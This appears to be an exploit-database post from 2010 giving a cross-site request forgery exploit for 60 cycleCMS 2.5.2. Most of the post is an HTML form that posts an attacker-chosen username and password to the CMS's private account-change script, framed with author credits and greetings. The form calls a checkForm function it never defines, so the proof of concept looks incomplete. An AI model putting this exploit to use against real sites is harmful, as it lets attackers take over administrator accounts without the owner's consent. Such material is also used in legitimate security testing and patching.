60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit
# Published : 2010-04-16
# Author : EL-KAHINA
# Previous Title : ZykeCMS V1.1 (Auth Bypass) SQL Injection Vulnerability
# Next Title : WebAdmin Shell Upload Vulnerability

========================================================================================                  
| # Title    : 60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit
| # Author   : EL-KAHINA                                                                                                                 
| # Home     : www.iqs3cur1ty.com/vb     
| # Web Site : http://php.opensourcecms.com/scripts/details.php?scriptid=337                                                                            
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       
| # Bug      : CSRF                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
<html>
<body>
<h2>Change Username or Password</h2>
<p>Enter desired username and password.</p>
<form action="http://127.0.0.1/60cycleCMS.2.5.2/private/changeUserPass.php" method="post" name="changeUserPass">
Desired Username: <input name="user" type="text" /><br />
Desired Password: <input name="pass" type="password"/><br />
Confirm Desired Password: <input name="passConfirm" type="password"/><br />
<input type="button" value="Submit" onclick="checkForm(this.form)" />
</form>
</body>
</html>
 
==========================================
Greetz : Exploit-db Team 
all my friend :(Dz-Ghost Team ) 
im indoushka's sister
------------------------------------------